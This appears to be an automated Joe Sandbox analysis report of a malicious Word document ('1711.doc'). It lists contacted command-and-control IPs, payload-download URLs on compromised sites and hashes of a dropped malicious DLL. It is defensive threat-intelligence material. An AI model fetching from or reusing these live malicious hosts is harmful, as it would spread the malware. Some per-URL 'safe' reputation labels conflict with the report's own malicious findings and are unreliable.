https://www.odwebp.svc.ms	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://web.microsoftstream.com/video/	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	false		high
https://graph.windows.net	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pesterp	powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 00000008.00000002.309921606.000001C419462000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://45.79.33.48/	rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp, rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	false		high
https://ncus.contentsync.	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
http://weather.service.msn.com/data.aspx	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://51.178.61.60/xlgRAUoKyrAaNnNNtTNh	rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL4053062332-1002	rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
http://thepilatesstudionj.co	powershell.exe, 00000005.00000002.343021094.0000000004CAE000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp	false		high
https://45.79.33.48:8080/0	rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://wus2.contentsync.	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/ios	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	false		high
https://o365auditrealtimeingestion.manage.office.com	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://45.79.33.48:8080/2	rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://entitlement.diagnostics.office.com	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://outlook.office.com/	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000008.00000003.287038973.000001C419431000.00000004.00000001.sdmp	false		high
https://substrate.office.com/search/api/v1/SearchHistory	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://graph.windows.net/	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://devnull.onenote.com	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://messaging.office.com/	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
http://crl.micr	powershell.exe, 00000005.00000003.309254161.0000000007861000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	false		high
https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/	PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	true	Avira URL Cloud: safe	unknown
https://168.197.250.14/563209-4053062332-1002	rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://skyapi.live.net/Activity/	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://168.197.250.14/W	rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.pngp	powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.cortana.ai	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://visio.uservoice.com/forums/368202-visio-on-devices	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://staging.cortana.ai	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/embed?	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://augloop.office.com	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000008.00000003.309189585.000001C419456000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	false		high
https://api.diagnostics.office.com	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000008.00000002.309911672.000001C41945E000.00000004.00000001.sdmp	false		high
https://store.office.de/addinstemplate	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://wus2.pagecontentsync.	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL2q	rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.powerbi.com/v1.0/myorg/datasets	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://51.178.61.60/E	rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/	PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	true	Avira URL Cloud: malware	unknown
https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL	rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cortana.ai/api	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://168.197.250.14/h	rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com	svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	false		high
https://45.79.33.48:8080/a	rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://api.diagnosticssdf.office.com	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
45.79.33.48	unknown	United States	63949	LINODE-APLinodeLLCUS	true
54.37.228.122	unknown	France	16276	OVHFR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
50.62.141.15	alfaofarms.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
72.167.40.83	thepilatesstudionj.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
51.178.61.60	unknown	France	16276	OVHFR	true
177.72.80.14	unknown	Brazil	262543	NewLifeFibraBR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.210.242.234	unknown	France	16276	OVHFR	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	526179
Start date:	22.11.2021
Start time:	11:00:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	1711.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@27/26@2/24
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 13.2% (good quality ratio 11.7%) Quality average: 68.1% Quality standard deviation: 31%
HCA Information:	Successful, ratio: 65% Number of executed functions: 15 Number of non-executed functions: 114
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.12.24, 52.109.12.23, 23.35.236.56, 40.112.88.60, 20.54.110.249, 40.91.112.76 Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, prod-w.nexus.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, nexus.officeapps.live.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Execution Graph export aborted for target powershell.exe, PID 6468 because it is empty Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:01:18	API Interceptor	2x Sleep call for process: svchost.exe modified
11:01:38	API Interceptor	29x Sleep call for process: powershell.exe modified
11:02:33	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	GQwxmGZFvtg.dll	Get hash	malicious	Browse
	wNjqkrm8pH.dll	Get hash	malicious	Browse
	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse
	52O6evfqQT.dll	Get hash	malicious	Browse
196.44.98.190	GQwxmGZFvtg.dll	Get hash	malicious	Browse
	wNjqkrm8pH.dll	Get hash	malicious	Browse
	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse
	52O6evfqQT.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	Y5EGM7BygT.exe	Get hash	malicious	Browse	216.128.137.31
	Hilix.arm7	Get hash	malicious	Browse	104.238.167.225
	sora.x86	Get hash	malicious	Browse	149.28.66.6
	XxMcevQr2Z	Get hash	malicious	Browse	44.174.108.65
	f4gxrcTDkV.exe	Get hash	malicious	Browse	149.28.253.196
	SOO6hKZ7M0.exe	Get hash	malicious	Browse	149.28.253.196
	BVxT3jA2K0.exe	Get hash	malicious	Browse	216.128.137.31
	SOO6hKZ7M0.exe	Get hash	malicious	Browse	149.28.253.196
	f4gxrcTDkV.exe	Get hash	malicious	Browse	149.28.253.196
	wmwL0AmWha.exe	Get hash	malicious	Browse	149.28.253.196
	AUurXinKE2.exe	Get hash	malicious	Browse	149.28.253.196
	yeLdmaW3oj.exe	Get hash	malicious	Browse	216.128.137.31
	7WXfPYaWt2.exe	Get hash	malicious	Browse	216.128.137.31
	b0sJQVW62p	Get hash	malicious	Browse	78.141.232.141
	7u0Gj7aYfG.exe	Get hash	malicious	Browse	216.128.137.31
	I6erIt5Uil.exe	Get hash	malicious	Browse	149.28.253.196
	I6erIt5Uil.exe	Get hash	malicious	Browse	149.28.253.196
	GkQngTTbVE.exe	Get hash	malicious	Browse	216.128.137.31
	malware.dll	Get hash	malicious	Browse	45.77.0.96
	BPjUXSEwuL.exe	Get hash	malicious	Browse	149.28.253.196
EcobandGH	n6J7QJs4bk.dll	Get hash	malicious	Browse	196.44.109.73
	GQwxmGZFvtg.dll	Get hash	malicious	Browse	196.44.98.190
	wNjqkrm8pH.dll	Get hash	malicious	Browse	196.44.98.190
	5YO8hZg21O.dll	Get hash	malicious	Browse	196.44.98.190
	dUGnMYeP1C.dll	Get hash	malicious	Browse	196.44.98.190
	yFAXc9z51V.dll	Get hash	malicious	Browse	196.44.98.190
	9fC0as7YLE.dll	Get hash	malicious	Browse	196.44.98.190
	FIyE6huzxV.dll	Get hash	malicious	Browse	196.44.98.190
	V0gZWRXv8d.dll	Get hash	malicious	Browse	196.44.98.190
	t5EuQW2GUF.dll	Get hash	malicious	Browse	196.44.98.190
	uh1WyesPlh.dll	Get hash	malicious	Browse	196.44.98.190
	8rryPzJR1p.dll	Get hash	malicious	Browse	196.44.98.190
	a65FgjVus4.dll	Get hash	malicious	Browse	196.44.98.190
	bWjYh6H8wk.dll	Get hash	malicious	Browse	196.44.98.190
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	196.44.98.190
	eyPPiz3W6u.dll	Get hash	malicious	Browse	196.44.98.190
	HjYSwxqyUn.dll	Get hash	malicious	Browse	196.44.98.190
	f47YPsvRI3.dll	Get hash	malicious	Browse	196.44.98.190
	2n64VXT08V.dll	Get hash	malicious	Browse	196.44.98.190
	qUr4bXsweR.dll	Get hash	malicious	Browse	196.44.98.190

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	cs.exe	Get hash	malicious	Browse	51.178.61.60
	0MGLPJiSa5.dll	Get hash	malicious	Browse	51.178.61.60
	0MGLPJiSa5.dll	Get hash	malicious	Browse	51.178.61.60
	bbyGAgHI9O.dll	Get hash	malicious	Browse	51.178.61.60
	Vs6ZDk0LMC.dll	Get hash	malicious	Browse	51.178.61.60
	sTh52oTZDh.dll	Get hash	malicious	Browse	51.178.61.60
	loveTubeLike.dll	Get hash	malicious	Browse	51.178.61.60
	2SR3psYDHQ.js	Get hash	malicious	Browse	51.178.61.60
	GQwxmGZFvtg.dll	Get hash	malicious	Browse	51.178.61.60
	Fuutbqvhmc.dll	Get hash	malicious	Browse	51.178.61.60
	wNjqkrm8pH.dll	Get hash	malicious	Browse	51.178.61.60
	5YO8hZg21O.dll	Get hash	malicious	Browse	51.178.61.60
	dUGnMYeP1C.dll	Get hash	malicious	Browse	51.178.61.60
	yFAXc9z51V.dll	Get hash	malicious	Browse	51.178.61.60
	9fC0as7YLE.dll	Get hash	malicious	Browse	51.178.61.60
	FIyE6huzxV.dll	Get hash	malicious	Browse	51.178.61.60
	V0gZWRXv8d.dll	Get hash	malicious	Browse	51.178.61.60
	t5EuQW2GUF.dll	Get hash	malicious	Browse	51.178.61.60
	uh1WyesPlh.dll	Get hash	malicious	Browse	51.178.61.60
	8rryPzJR1p.dll	Get hash	malicious	Browse	51.178.61.60

Dropped Files

No context

Created / dropped Files

C:\ProgramData\13791789.dll Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	485376
Entropy (8bit):	7.178849265977026
Encrypted:	false
SSDEEP:	12288:bdv8jkvzqZvv2wLB4mTi12yD88kYwZ1h1:b2Zvv2cTTi1v0Z1h
MD5:	6ED0F0B0046573CFBA56C98152B44F28
SHA1:	53FC583339C441DFFBFCF2C2F1F660C1CAD96714
SHA-256:	A84F4C76EF86D165088979CB91506B65C3D84CB92386E3AA68EABA4EFE0C9B5E
SHA-512:	5DEF2C24FBA65FB8CADE6954609F29DDC175DB1FD1A797BEFF68C2FCDA44E8E7E751294498806191120807EBC07948CA4EE9F23DE402959CD0EE9DD4FF263AEA
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 34%, Browse Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................................................PE..L....L.a...........!................&X....................................................@.......................................... ...D...................p...3......................................@............................................text............................... ..`.rdata...<.......>..................@..@.data...,%..........................@....rsrc....D... ...F..................@..@.reloc...3...p...4...4..............@..B................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.24858969187891947
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4X:BJiRdwfu2SRU4X
MD5:	DD06E4E46FED0F4FF0E7F22FDE2F4D31
SHA1:	7C97D38EBD4C262A598C1E4C5332C840B65FC479
SHA-256:	E024B0D15BE41E914C20F1031C7375E799A95B6411D94B1DD0B79F3C835C1350
SHA-512:	C87B3F7AD785C83037505981A3D86CDE2329F0B7C6DC7F2AB22A17F11746007E06B4FCA26DD96D51293E4C18B5D729580CCE4E22D94083B8D330028CF797EB8D
Malicious:	false
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x985cf3fb, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.250662044507451
Encrypted:	false
SSDEEP:	384:M+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TSB2nSB2RSjlK/+mLesOj1J2
MD5:	9B95D532A2A3CCF486623DBBC6331B0B
SHA1:	72CE33EB727A002D41BD78A0841A313C775C651C
SHA-256:	D8A2964C164F32BA48DBFEA35AD0CA47E8EBFAECF946663022C8805C3203E47A
SHA-512:	E1185044CF93EBA08BA67E2526097ED9FC953B6B5BD0F3E3C24E932B411DE1F3F0F7DB4B2C21FFD8902FD3D79CCF0CEC2EBEB6731FDA3D4DC1AD19CF02AB8999
Malicious:	false
Preview:	.\..... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................Z......y.................C.UK.....y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07601057257993825
Encrypted:	false
SSDEEP:	3:+lEv3nWl+/t+Al/bJdAtip/zunllllill3Vkttlmlnl:+A3WlAt+At4Xnll/G3
MD5:	7ADE2B01C2356CD8E36C319B8D345D96
SHA1:	9D2F0EDDEBF85DD6E816C3A81FF9EFA1F3A32B9F
SHA-256:	19FBBA2859455466CA003838C05CC59CAFD777B63A5DF63D3BDE5C396C0BB2DB
SHA-512:	0EF11C34A2307E94F386F6952D1780CD537943D1C62703A5D01C79015C0A5DA7AEE215209097FA9A1B41FC10CC79AEEDDFDE34F2CCAD92E76566A9B66AEC34D3
Malicious:	false
Preview:	eE#......................................3...w.......y.......w...............w.......w....:O.....w..................C.UK.....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\228B70BA-96BF-49A2-BAE9-6D7972869BA5 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	140193
Entropy (8bit):	5.357924087660622
Encrypted:	false
SSDEEP:	1536:ucQIfgxrBdA3gBwtnQ9DQW+z2k4Ff7nXbovidXiE6LWmE9:OuQ9DQW+zYXfH
MD5:	BC5B16546FF935863E164008B70EBB46
SHA1:	5ACABF8FB71E9F94376C76CE57C63A3D428C1D6C
SHA-256:	AB486F6BC137D7EFC6FB1EDA506BE4182AA27DD981E403375129EB6CD4CFF0D1
SHA-512:	977CB1C56C8D6DC846A318D3A56CAC0507E938972EE60CEFD696798281F249EADEBFAC71BEF116FCDACF675731D50CFBA63D7C3FAFD76B8D4A41ADAE3A550A75
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-11-22T10:01:13">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5EEF27A6.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	121507
Entropy (8bit):	7.978393301250379
Encrypted:	false
SSDEEP:	3072:oXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqc:oXw50+OukzVXV2uhDj
MD5:	D3C11BC087FAF4372F4C5D37E06FCFFD
SHA1:	40A9FE4D47DADFDB1463D63F14D6D60641AC19E5
SHA-256:	6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
SHA-512:	C50363E3CA99B4537A8BA625D84CD0A8C2E8FB15D1FF0163E967D3536E373F3449EB4489EC117766D78B1386D60192453FAE8C372119E32D98E58B07844216EB
Malicious:	false
